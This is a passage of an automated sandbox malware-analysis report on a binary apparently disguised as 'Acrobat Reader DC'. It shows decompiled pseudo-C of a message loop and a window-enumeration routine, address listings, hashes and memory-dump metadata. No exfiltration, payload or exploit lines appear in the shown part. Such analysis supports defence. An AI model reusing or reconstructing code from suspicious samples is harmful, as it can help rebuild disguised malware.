                                  											_t533[0x115] = _t462;
                                  										}
                                  										__eflags = _t533[0x3e] - 8;
                                  										if(_t533[0x3e] != 8) {
                                  											_t511 =  *_t533;
                                  											_t471 = _v260;
                                  											__eflags = _t533 + _t511->message;
                                  											E00403CD0(_t533 + _t511->message, _v260, _t462);
                                  										} else {
                                  											asm("fild dword [esp+0x2c]");
                                  											__eflags = _v304;
                                  											if(_v304 < 0) {
                                  												_t606 = _t606 +  *0x48cd18;
                                  											}
                                  											_t511 =  *_t533;
                                  											_v324 = _t606;
                                  											_t471 =  &_v324;
                                  											E004574B4(_t533 + _t511->message,  &_v324);
                                  										}
                                  										_t533[0x51] = 1;
                                  										_t533[0x3e] = _t462;
                                  										Sleep(_t533[0xbd]);
                                  										goto L29;
                                  									}
                                  									__eflags = _v329;
                                  									if(_v329 != 0) {
                                  										_v329 = 0;
                                  										goto L29;
                                  									}
                                  									_v329 = 1;
                                  									goto L133;
                                  								}
                                  								_t379 = E0040C620(_t533[0x113]);
                                  								_t462 = 0;
                                  								__eflags = _t511;
                                  								if(__eflags < 0) {
                                  									goto L127;
                                  								}
                                  								if(__eflags > 0) {
                                  									L123:
                                  									_t380 = _t533[0x115];
                                  									__eflags = _t380 - _t462;
                                  									if(_t380 != _t462) {
                                  										CloseHandle(_t380);
                                  										_t533[0x115] = _t462;
                                  									}
                                  									_t511 =  *_t533;
                                  									_t471 = _t533 + _t511->message;
                                  									_v324 = _t462;
                                  									E0040D410( &_v324, _t533 + _t511->message);
                                  									goto L66;
                                  								}
                                  								__eflags = _t379 - _t533[0x112];
                                  								if(_t379 < _t533[0x112]) {
                                  									goto L127;
                                  								}
                                  								goto L123;
                                  							} else {
                                  								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
                                  									Sleep(0xa);
                                  									__eflags = _t533[0xbc];
                                  									if(_t533[0xbc] == 0) {
                                  										L56:
                                  										_t384 = _t533[0x3e];
                                  										__eflags = _t384 - 3;
                                  										if(_t384 < 3) {
                                  											goto L29;
                                  										}
                                  										_t385 = _t384 - 3;
                                  										__eflags = _t385 - 3;
                                  										if(__eflags > 0) {
                                  											goto L29;
                                  										} else {
                                  											switch( *((intOrPtr*)(_t385 * 4 +  &M0042E18D))) {
                                  												case 0:
                                  													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
                                  													goto L149;
                                  												case 1:
                                  													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
                                  													__esi = __eax;
                                  													__eflags = __esi;
                                  													if(__eflags < 0) {
                                  														goto L150;
                                  													}
                                  													if(__eflags <= 0) {
                                  														goto L153;
                                  													}
                                  													goto L29;
                                  												case 2:
                                  													_t386 = E0046FDBF(__eflags, _t606, _t533);
                                  													L149:
                                  													_t547 = _t386;
                                  													__eflags = _t547;
                                  													if(__eflags >= 0) {
                                  														goto L151;
                                  													}
                                  													goto L150;
                                  												case 3:
                                  													__eax = E0046FDBF(__eflags, __fp0, __edi);
                                  													__esi = __eax;
                                  													__eflags = __esi;
                                  													if(__eflags < 0) {
                                  														L150:
                                  														_t511 =  ~_t547;
                                  														E00403C90(_t533 +  *_t533->message, _t511, 0);
                                  														_t471 = _t533 +  *_t533->message;
                                  														_v332 = 0;
                                  														E0040D410( &_v332, _t533 +  *_t533->message);
                                  														__eflags = _t547;
                                  														L151:
                                  														if(__eflags == 0) {
                                  															goto L29;
                                  														}
                                  														__eflags = _t547;
                                  														if(_t547 <= 0) {
                                  															L156:
                                  															_push(_t533[0xbd]);
                                  															_t533[0x51] = 1;
                                  															_t533[0x3e] = 0;
                                  															E004331A2(_t533[0xbd], _t606);
                                  															_t572 =  &(_t572[1]);
                                  															goto L29;
                                  														}
                                  														L153:
                                  														_t389 = _t533[0x3e];
                                  														__eflags = _t389 - 5;
                                  														if(_t389 == 5) {
                                  															L155:
                                  															_v188.hwnd = 0;
                                  															_v188.wParam = 1;
                                  															_v188.lParam = 0;
                                  															E00408F40(_t533,  &_v188);
                                  															_t471 =  *_t533;
                                  															_t511 = _t533 +  *_t533->message;
                                  															__eflags = _t511;
                                  															_v188.wParam = 7;
                                  															_v188 =  *(_t533[0x76]);
                                  															E004731E1( *_t533, _t511,  &_v188, 0);
                                  															E00408F40(_t533,  &_v188);
                                  															goto L156;
                                  														}
                                  														__eflags = _t389 - 3;
                                  														if(_t389 != 3) {
                                  															goto L156;
                                  														}
                                  														goto L155;
                                  													}
                                  													if(__eflags > 0) {
                                  														goto L29;
                                  													}
                                  													goto L153;
                                  											}
                                  										}
                                  										while(1) {
                                  											L58:
                                  											__eflags = _v244.message - 0x12;
                                  											if(_v244.message == 0x12) {
                                  												break;
                                  											}
                                  											_t471 = 0x4a8630;
                                  											_t336 = E0040D150(0x4a8630,  &_v244);
                                  											__eflags = _t336;
                                  											if(_t336 == 0) {
                                  												_t338 = E0040D170(0x4a8630,  &_v244);
                                  												__eflags = _t338;
                                  												if(_t338 == 0) {
                                  													TranslateMessage( &_v244);
                                  													_t471 =  &_v244;
                                  													DispatchMessageW( &_v244);
                                  												}
                                  											}
                                  											_t511 =  &_v244;
                                  											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
                                  											__eflags = _t337;
                                  											if(_t337 == 0) {
                                  												L8:
                                  												if( *0x4974e6 == 1) {
                                  													 *0x4974ec = 0;
                                  													 *0x4974e6 = 0;
                                  													_t533[0x3e] = 1;
                                  												}
                                  												if(_t533[0x3e] == 1) {
                                  													_t471 = _t533 +  *_t533->message;
                                  													_v304 = 0;
                                  													E0040D410( &_v304, _t533 +  *_t533->message);
                                  													goto L30;
                                  												} else {
                                  													goto L10;
                                  												}
                                  											} else {
                                  												continue;
                                  											}
                                  										}
                                  										_t533[0x3f] = 1;
                                  										_t533[0x3e] = 1;
                                  										goto L8;
                                  									}
                                  									_t400 = E0040C620(_t533[0xbe]);
                                  									_t471 = 0;
                                  									__eflags = _t511;
                                  									if(__eflags < 0) {
                                  										goto L56;
                                  									}
                                  									_t462 = 0;
                                  									if(__eflags > 0) {
                                  										L65:
                                  										__eflags = _t533[0x3e] - 2;
                                  										if(_t533[0x3e] != 2) {
                                  											_t471 = _t533 +  *_t533->message;
                                  											_v324 = _t462;
                                  											E0040D410( &_v324, _t533 +  *_t533->message);
                                  										}
                                  										L66:
                                  										_t533[0x51] = 1;
                                  										_t533[0x3e] = _t462;
                                  										goto L29;
                                  									}
                                  									__eflags = _t400 - _t533[0xbc];
                                  									if(_t400 >= _t533[0xbc]) {
                                  										goto L65;
                                  									}
                                  									goto L56;
                                  								} else {
                                  									_t480 = _a4;
                                  									_t533[0x3d] = _t480;
                                  									_t403 = _t480;
                                  									_t471 = _t480 + 1;
                                  									_a4 = _t480 + 1;
                                  									_t598 = _t403 -  *0x4a90f8; // 0x0
                                  									if(_t598 > 0 || _t403 <= 0) {
                                  										L160:
                                  										_t533[0x3e] = 1;
                                  										goto L29;
                                  									} else {
                                  										_t405 = (_t403 << 4) +  *0x4a912c;
                                  										if(_t405 == 0) {
                                  											goto L160;
                                  										}
                                  										_t549 = _t405;
                                  										_t471 =  *(_t549 + 4);
                                  										_v328 = 0;
                                  										_t511 =  *( *(_t549 + 4));
                                  										_t406 = _t511->wParam;
                                  										if(_t406 != 0) {
                                  											__eflags = _t406 - 0x34;
                                  											if(__eflags != 0) {
                                  												_t407 = _t406 - 1;
                                  												__eflags = _t407 - 0x7e;
                                  												if(_t407 > 0x7e) {
                                  													L166:
                                  													_t511 = _t511->wParam;
                                  													E0045E737(_t606, _t533, 0x1388, _t511);
                                  													goto L29;
                                  												}
                                  												switch( *((intOrPtr*)(( *(_t407 + 0x409614) & 0x000000ff) * 4 +  &M00409600))) {
                                  													case 0:
                                  														__eax = 0;
                                  														__ecx =  &_v164;
                                  														_v164 = 0;
                                  														_v152 = 0;
                                  														__eax =  &_v328;
                                  														__edx = __esi;
                                  														__ebx = __edi;
                                  														_v156 = 1;
                                  														__eax = E00408CC0( &_v328, __ebx, __esi, __fp0,  &_v164);
                                  														__eflags = __eax;
                                  														if(__eax == 0) {
                                  															__edx =  *(__esi + 4);
                                  															__eax = _v328;
                                  															__eax =  *( *(__esi + 4) + _v328 * 4);
                                  															__eflags =  *((short*)(__eax + 8)) - 0x7f;
                                  															if( *((short*)(__eax + 8)) != 0x7f) {
                                  																__ecx =  *((short*)(__eax + 0xa));
                                  																__eax = E0045E737(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
                                  															}
                                  														}
                                  														__esi =  &_v164;
                                  														__eax = E00408F40(__edi, __esi);
                                  														goto L29;
                                  													case 1:
                                  														E00408FC0(_t549, _t606, _t533);
                                  														goto L29;
                                  													case 2:
                                  														__ebx = __edi + 0x488;
                                  														__eax = E00432416(__ebx);
                                  														__eflags = __al;
                                  														if(__al != 0) {
                                  															__eax =  &_v328;
                                  															__eax = E0047FAAE(__fp0, __edi, __esi,  &_v328, __ebx);
                                  															__eflags = __eax;
                                  															if(__eax != 0) {
                                  																__ecx =  *(__esi + 4);
                                  																__edx = _v328;
                                  																__eax =  *( *(__esi + 4) + _v328 * 4);
                                  																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
                                  																__eax = E0045E737(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
                                  															}
                                  														} else {
                                  															__edx =  *((short*)(__edx + 0xa));
                                  															__eax = E0045E737(__fp0, __edi, 0xa7, __edx);
                                  														}
                                  														goto L29;
                                  													case 3:
                                  														goto L29;
                                  													case 4:
                                  														goto L166;
                                  												}
                                  											}
                                  											_t471 =  &_v276;
                                  											_v276 = 0;
                                  											_v268 = 1;
                                  											_v264 = 0;
                                  											_t414 = E004096A0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277);
                                  											__eflags = _t414;
                                  											if(_t414 != 0) {
                                  												L37:
                                  												_t564 = _v264;
                                  												__eflags = _t564;
                                  												if(_t564 != 0) {
                                  													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
                                  													_t511 =  *(_t564 + 0xc);
                                  													__eflags = _t511->hwnd;
                                  													if(_t511->hwnd == 0) {
                                  														_push(_t564->i);
                                  														E004111DC();
                                  														_t471 =  *(_t564 + 0xc);
                                  														_push( *(_t564 + 0xc));
                                  														E004111DC();
                                  														_t572 =  &(_t572[2]);
                                  													}
                                  													_push(_t564);
                                  													E004111DC();
                                  													_t572 =  &(_t572[1]);
                                  													_v264 = 0;
                                  												}
                                  												_t415 = _v268;
                                  												__eflags = _t415 - 8;
                                  												if(_t415 == 8) {
                                  													_t565 = _v276;
                                  													__eflags = _t565;
                                  													if(_t565 != 0) {
                                  														__imp__#9(_t565);
                                  														_push(_t565);
                                  														E004111DC();
                                  														_t572 =  &(_t572[1]);
                                  													}
                                  												} else {
                                  													__eflags = _t415 - 0xa;
                                  													if(_t415 == 0xa) {
                                  														_t417 = _v276;
                                  														__eflags = _t417;
                                  														if(_t417 != 0) {
                                  															E0044318E(_t417);
                                  														}
                                  													} else {
                                  														__eflags = _t415 - 5;
                                  														if(_t415 == 5) {
                                  															E0040E270( &_v276, _t564);
                                  														} else {
                                  															__eflags = _t415 - 0xb;
                                  															if(_t415 == 0xb) {
                                  																_t566 = _v276;
                                  																_t511 =  *(_t566 + 4);
                                  																_push(_t511);
                                  																E004111DC();
                                  																_push(_t566);
                                  																E004111DC();
                                  																_t572 =  &(_t572[2]);
                                  															} else {
                                  																__eflags = _t415 - 0xc;
                                  																if(_t415 == 0xc) {
                                  																	_t423 = _v276;
                                  																	__eflags = _t423;
                                  																	if(_t423 != 0) {
                                  																		E0044B3D9(_t423);
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  												goto L29;
                                  											}
                                  											_t511 =  *(_t549 + 4);
                                  											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
                                  											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
                                  											if( *((short*)(_t431 + 8)) != 0x7f) {
                                  												_t471 =  *((short*)(_t431 + 0xa));
                                  												E0045E737(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
                                  												E00408F40(_t533,  &_v288);
                                  												goto L29;
                                  											}
                                  											goto L37;
                                  										} else {
                                  											E0040AFA0(_t606, _t533, _t549,  &_a4); // executed
                                  											goto L29;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if( *0x4a8668 != 0) {
                                  							__eflags = _t533[0x3e];
                                  							if(_t533[0x3e] == 0) {
                                  								goto L10;
                                  							}
                                  						}
                                  						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
                                  							goto L58;
                                  						}
                                  						goto L8;
                                  					}
                                  					goto L30;
                                  				}
                                  			}

                                  0x0042dc38
                                  0x0042dc3d
                                  0x00000000
                                  0x0042dc3d
                                  0x0042dc46
                                  0x0042dc4a
                                  0x0042dc4a
                                  0x004092be
                                  0x004092c6
                                  0x00000000
                                  0x00000000
                                  0x004092d3
                                  0x0042dc54
                                  0x0042dc5b
                                  0x00000000
                                  0x00000000
                                  0x0042dc66
                                  0x0042dc6b
                                  0x0042dc6b
                                  0x0042dc75
                                  0x0042dc7a
                                  0x0042dc7c
                                  0x00000000
                                  0x00000000
                                  0x0042dc8c
                                  0x0042dc8e
                                  0x00000000
                                  0x00000000
                                  0x0042dcb6
                                  0x0042dcbb
                                  0x0042dcbd
                                  0x00000000
                                  0x00000000
                                  0x0042dbaf
                                  0x0042dbb6
                                  0x0042dbbd
                                  0x0042dbc4
                                  0x0042dbcd
                                  0x0042dbd4
                                  0x0042dbe0
                                  0x0042dbe7
                                  0x0042dbf2
                                  0x0042dbf9
                                  0x0042dc00
                                  0x0042dc0c
                                  0x0042dc13
                                  0x0042dc16
                                  0x0042dc1d
                                  0x0042dc22
                                  0x0042dc28
                                  0x00000000
                                  0x0042dc28
                                  0x0042dcc4
                                  0x0042dcc8
                                  0x0042dcc8
                                  0x004092d9
                                  0x004092d9
                                  0x004092e2
                                  0x0042dcd2
                                  0x0042dcdb
                                  0x0042dce1
                                  0x0042dce5
                                  0x0042dcea
                                  0x0042dcfc
                                  0x0042dd02
                                  0x0042dd09
                                  0x0042dd18
                                  0x0042dd1c
                                  0x0042dd22
                                  0x0042dd27
                                  0x0042dd2e
                                  0x0042dd2e
                                  0x00000000
                                  0x0042dcea
                                  0x004092eb
                                  0x0042dd3f
                                  0x0042dd45
                                  0x0042dd4c
                                  0x0042ddaf
                                  0x0042ddb1
                                  0x0042ddb1
                                  0x0042ddbc
                                  0x0042ddc2
                                  0x0042ddc7
                                  0x0042ddca
                                  0x0042ddd1
                                  0x0042ddf6
                                  0x0042ddfb
                                  0x00000000
                                  0x00000000
                                  0x0042de01
                                  0x0042de01
                                  0x0042de03
                                  0x0042de03
                                  0x0042de09
                                  0x0042de11
                                  0x0042de13
                                  0x0042de1f
                                  0x0042de2c
                                  0x0042de32
                                  0x0042de32
                                  0x0042de38
                                  0x0042de3f
                                  0x0042de76
                                  0x0042de78
                                  0x0042de81
                                  0x0042de83
                                  0x0042de45
                                  0x0042de49
                                  0x0042de4d
                                  0x0042de4f
                                  0x0042de55
                                  0x0042de55
                                  0x0042de5b
                                  0x0042de5d
                                  0x0042de64
                                  0x0042de6c
                                  0x0042de6c
                                  0x0042de8f
                                  0x0042de96
                                  0x0042de9c
                                  0x00000000
                                  0x0042de9c
                                  0x0042ddd7
                                  0x0042dddc
                                  0x0042ddec
                                  0x00000000
                                  0x0042ddec
                                  0x0042dde2
                                  0x00000000
                                  0x0042dde2
                                  0x0042dd58
                                  0x0042dd5f
                                  0x0042dd61
                                  0x0042dd63
                                  0x00000000
                                  0x00000000
                                  0x0042dd69
                                  0x0042dd7b
                                  0x0042dd7b
                                  0x0042dd81
                                  0x0042dd83
                                  0x0042dd8a
                                  0x0042dd90
                                  0x0042dd90
                                  0x0042dd96
                                  0x0042dd9b
                                  0x0042dda1
                                  0x0042dda5
                                  0x00000000
                                  0x0042dda5
                                  0x0042dd6f
                                  0x0042dd75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004092fa
                                  0x004092fd
                                  0x004094d1
                                  0x004094d7
                                  0x004094de
                                  0x00409505
                                  0x00409505
                                  0x0040950b
                                  0x0040950e
                                  0x00000000
                                  0x00000000
                                  0x0042dec0
                                  0x0042dec3
                                  0x0042dec6
                                  0x00000000
                                  0x0042decc
                                  0x0042decc
                                  0x00000000
                                  0x0042defc
                                  0x00000000
                                  0x00000000
                                  0x0042dfdc
                                  0x0042dfe1
                                  0x0042dfe3
                                  0x0042dfe5
                                  0x00000000
                                  0x00000000
                                  0x0042dfeb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042ded4
                                  0x0042df01
                                  0x0042df01
                                  0x0042df03
                                  0x0042df05
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042dedf
                                  0x0042dee4
                                  0x0042dee6
                                  0x0042dee8
                                  0x0042df0b
                                  0x0042df14
                                  0x0042df19
                                  0x0042df23
                                  0x0042df29
                                  0x0042df31
                                  0x0042df36
                                  0x0042df38
                                  0x0042df38
                                  0x00000000
                                  0x00000000
                                  0x0042df3e
                                  0x0042df40
                                  0x0042dfb4
                                  0x0042dfba
                                  0x0042dfbb
                                  0x0042dfc2
                                  0x0042dfcc
                                  0x0042dfd1
                                  0x00000000
                                  0x0042dfd1
                                  0x0042df46
                                  0x0042df46
                                  0x0042df4c
                                  0x0042df4f
                                  0x0042df5e
                                  0x0042df6f
                                  0x0042df76
                                  0x0042df81
                                  0x0042df88
                                  0x0042df8d
                                  0x0042df95
                                  0x0042df95
                                  0x0042df98
                                  0x0042dfa3
                                  0x0042dfaa
                                  0x0042dfaf
                                  0x00000000
                                  0x0042dfaf
                                  0x0042df55
                                  0x0042df58
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042df58
                                  0x0042deee
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042decc
                                  0x00409520
                                  0x00409520
                                  0x00409520
                                  0x00409525
                                  0x00000000
                                  0x00000000
                                  0x00409530
                                  0x00409535
                                  0x0040953a
                                  0x0040953c
                                  0x00409548
                                  0x0040954d
                                  0x0040954f
                                  0x00409556
                                  0x0040955c
                                  0x00409561
                                  0x00409561
                                  0x0040954f
                                  0x0040956f
                                  0x00409574
                                  0x00409576
                                  0x00409578
                                  0x00409270
                                  0x00409277
                                  0x0042d7f3
                                  0x0042d7fa
                                  0x0042d801
                                  0x0042d801
                                  0x00409284
                                  0x0042e140
                                  0x0042e146
                                  0x0042e14e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040957e
                                  0x00000000
                                  0x0040957e
                                  0x00409578
                                  0x0042d7dd
                                  0x0042d7e4
                                  0x00000000
                                  0x0042d7e4
                                  0x004094e6
                                  0x004094eb
                                  0x004094ed
                                  0x004094ef
                                  0x00000000
                                  0x00000000
                                  0x004094f1
                                  0x004094f3
                                  0x0040958c
                                  0x0040958c
                                  0x00409593
                                  0x0042deac
                                  0x0042deb2
                                  0x0042deb6
                                  0x0042deb6
                                  0x00409599
                                  0x00409599
                                  0x004095a0
                                  0x00000000
                                  0x004095a0
                                  0x004094f9
                                  0x004094ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409327
                                  0x00409327
                                  0x0040932a
                                  0x00409330
                                  0x00409332
                                  0x00409333
                                  0x00409336
                                  0x0040933c
                                  0x0042dff6
                                  0x0042dff6
                                  0x00000000
                                  0x0040934a
                                  0x0040934d
                                  0x00409353
                                  0x00000000
                                  0x00000000
                                  0x00409359
                                  0x0040935b
                                  0x00409360
                                  0x00409364
                                  0x00409366
                                  0x0040936c
                                  0x004093ae
                                  0x004093b1
                                  0x00409450
                                  0x00409451
                                  0x00409454
                                  0x0042e074
                                  0x0042e074
                                  0x0042e07f
                                  0x00000000
                                  0x0042e07f
                                  0x00409461
                                  0x00000000
                                  0x00409475
                                  0x00409477
                                  0x0040947e
                                  0x00409485
                                  0x0040948d
                                  0x00409491
                                  0x00409493
                                  0x00409495
                                  0x004094a0
                                  0x004094a5
                                  0x004094a7
                                  0x004094a9
                                  0x004094ac
                                  0x004094b0
                                  0x004094b3
                                  0x004094b8
                                  0x0042e005
                                  0x0042e00d
                                  0x0042e00d
                                  0x004094b8
                                  0x004094be
                                  0x004094c5
                                  0x00000000
                                  0x00000000
                                  0x0040946b
                                  0x00000000
                                  0x00000000
                                  0x0042e017
                                  0x0042e01e
                                  0x0042e023
                                  0x0042e025
                                  0x0042e041
                                  0x0042e048
                                  0x0042e04d
                                  0x0042e04f
                                  0x0042e055
                                  0x0042e058
                                  0x0042e05c
                                  0x0042e05f
                                  0x0042e06a
                                  0x0042e06a
                                  0x0042e02b
                                  0x0042e02b
                                  0x0042e036
                                  0x0042e036
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409461
                                  0x004093bc
                                  0x004093c7
                                  0x004093cb
                                  0x004093d3
                                  0x004093d7
                                  0x004093dc
                                  0x004093de
                                  0x004093f5
                                  0x004093f5
                                  0x004093f9
                                  0x004093fb
                                  0x00409400
                                  0x00409402
                                  0x00409405
                                  0x00409407
                                  0x0042e0a6
                                  0x0042e0a7
                                  0x0042e0ac
                                  0x0042e0b2
                                  0x0042e0b3
                                  0x0042e0b8
                                  0x0042e0b8
                                  0x0040940d
                                  0x0040940e
                                  0x00409413
                                  0x00409416
                                  0x00409416
                                  0x0040941a
                                  0x0040941e
                                  0x00409421
                                  0x0042e0c0
                                  0x0042e0c4
                                  0x0042e0c6
                                  0x0042e0cd
                                  0x0042e0d3
                                  0x0042e0d4
                                  0x0042e0d9
                                  0x0042e0d9
                                  0x00409427
                                  0x00409427
                                  0x0040942a
                                  0x0042e0e1
                                  0x0042e0e5
                                  0x0042e0e7
                                  0x0042e0ee
                                  0x0042e0ee
                                  0x00409430
                                  0x00409430
                                  0x00409433
                                  0x0042e0fc
                                  0x00409439
                                  0x00409439
                                  0x0040943c
                                  0x0042e106
                                  0x0042e10a
                                  0x0042e10d
                                  0x0042e10e
                                  0x0042e116
                                  0x0042e117
                                  0x0042e11c
                                  0x00409442
                                  0x00409442
                                  0x00409445
                                  0x0042e124
                                  0x0042e128
                                  0x0042e12a
                                  0x0042e131
                                  0x0042e131
                                  0x0042e12a
                                  0x00409445
                                  0x0040943c
                                  0x00409433
                                  0x0040942a
                                  0x00000000
                                  0x00409421
                                  0x004093e0
                                  0x004093e7
                                  0x004093ea
                                  0x004093ef
                                  0x0042e089
                                  0x0042e091
                                  0x0042e09a
                                  0x00000000
                                  0x0042e09a
                                  0x00000000
                                  0x0040936e
                                  0x00409374
                                  0x00000000
                                  0x00409374
                                  0x0040936c
                                  0x0040933c
                                  0x004092fd
                                  0x004092eb
                                  0x0040924d
                                  0x0042d7cb
                                  0x0042d7d2
                                  0x00000000
                                  0x00000000
                                  0x0042d7d8
                                  0x0040926a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040926a
                                  0x00000000
                                  0x00409230

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  [Control-flow graph of the function at 0046ED8E, nodes marked Executed / Not Executed. API calls shown in the graph: GetForegroundWindow, GetDesktopWindow, EnumChildWindows, EnumWindows, IsWindow.]
                                  C-Code - Quality: 78%
                                  			E0046ED8E(void* __eflags, void* __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24, char _a28, char _a32) {
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				struct HWND__* _v80;
                                  				signed int _v84;
                                  				char _v88;
                                  				char _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t157;
                                  				void* _t158;
                                  				signed int _t173;
                                  				short* _t189;
                                  				signed int _t193;
                                  				signed int _t194;
                                  				signed int _t198;
                                  				signed int _t209;
                                  				signed int _t211;
                                  				char* _t214;
                                  				signed int _t215;
                                  				signed int _t218;
                                  				signed int _t220;
                                  				signed int _t222;
                                  				signed int _t223;
                                  				signed int _t224;
                                  				signed int _t225;
                                  				signed int _t227;
                                  				signed int _t228;
                                  				signed int _t229;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				signed int _t242;
                                  				signed int _t243;
                                  				signed int _t245;
                                  				signed int _t246;
                                  				signed int _t247;
                                  				signed int _t249;
                                  				signed int* _t252;
                                  				signed int _t258;
                                  				signed int _t263;
                                  				signed int _t269;
                                  				signed int* _t273;
                                  				signed int _t277;
                                  				intOrPtr* _t343;
                                  				struct HWND__* _t371;
                                  				signed int* _t373;
                                  				signed int _t378;
                                  				void* _t380;
                                  				void* _t381;
                                  				void* _t383;
                                  				void* _t385;
                                  				void* _t387;
                                  				void* _t388;
                                  				void* _t389;
                                  				void* _t390;
                                  				void* _t391;
                                  				void* _t392;
                                  				void* _t393;
                                  				void* _t398;
                                  
                                  				_t398 = __fp0;
                                  				_t393 = __eflags;
                                  				_t380 = (_t378 & 0xfffffff8) - 0x54;
                                  				_t158 = E004109E0(_t157, _a16);
                                  				_t343 = _a4;
                                  				_v72 = _t343 + 0xec;
                                  				E004109E0(_t158, _t343 + 0xec);
                                  				_t323 = _a8;
                                  				 *((char*)(_t343 + 4)) = _a32;
                                  				 *((char*)(_t343 + 5)) = _a28;
                                  				_v88 = _t343 + 0x14;
                                  				E0040E0A0(_t343 + 0x14, _a8);
                                  				_t361 = _t343 + 0x24;
                                  				_v80 = _t343 + 0x24;
                                  				E0040E0A0(_t343 + 0x24, _a12);
                                  				_v88 = _t343 + 0xbc;
                                  				E00402160(_t343 + 0xbc, 0x484ea8, _a8, _t343);
                                  				 *(_t343 + 0x10) = _a20;
                                  				 *(_t343 + 0xcc) = 1;
                                  				 *((char*)(_t343 + 0xc)) = 1;
                                  				 *((intOrPtr*)(_t343 + 8)) = 0;
                                  				 *((intOrPtr*)(_t343 + 0xd0)) = 0;
                                  				 *((intOrPtr*)(_t343 + 0xe4)) = 0;
                                  				E0040BC70( &_v60, _t393);
                                  				E0040BC70( &_v44, _t393);
                                  				_t287 =  &_v28;
                                  				E0040BC70( &_v28, _t393);
                                  				_t169 =  *(_t343 + 0x10);
                                  				if( *(_t343 + 0x10) < 0) {
                                  					_t269 = E004152BB(_t323, _t169);
                                  					_t380 = _t380 + 4;
                                  					 *(_t343 + 0x10) = _t269;
                                  					 *((char*)(_t343 + 0xc)) = 0;
                                  				}
                                  				_t395 =  *(_t343 + 0x10) - 4;
                                  				if( *(_t343 + 0x10) == 4) {
                                  					E00469296(_v88, _t395, _t398, _v88);
                                  					 *(_t343 + 0x10) = 1;
                                  				}
                                  				if(E00436565(_v88) == 0 || E00436565(_t361) == 0) {
                                  					_t362 = _v88;
                                  					__eflags =  *((short*)(E00401C90(0, _v88, __eflags))) - 0x5b;
                                  					_t273 = _a4;
                                  					if(__eflags != 0) {
                                  						L54:
                                  						_t173 = E00436565( &_v20);
                                  						__eflags = _t173;
                                  						if(_t173 == 0) {
                                  							E0040E0A0(_v88,  &_v20);
                                  						}
                                  						__eflags = _t273[2];
                                  						if(_t273[2] == 0) {
                                  							_t273[2] = 1;
                                  						}
                                  						_t273[2] = _t273[2] | 0x00000004;
                                  						__eflags = _t273[3];
                                  						if(_t273[3] == 0) {
                                  							E00410BC0(_v76);
                                  						}
                                  						__eflags = _t273[2] & 0x00000001;
                                  						if((_t273[2] & 0x00000001) != 0) {
                                  							__eflags = _t273[3];
                                  							if(_t273[3] == 0) {
                                  								E00410BC0(_v88);
                                  							}
                                  						}
                                  						__eflags = _a24;
                                  						_push(_t273);
                                  						_push(0x46130d);
                                  						if(_a24 == 0) {
                                  							EnumWindows(); // executed
                                  						} else {
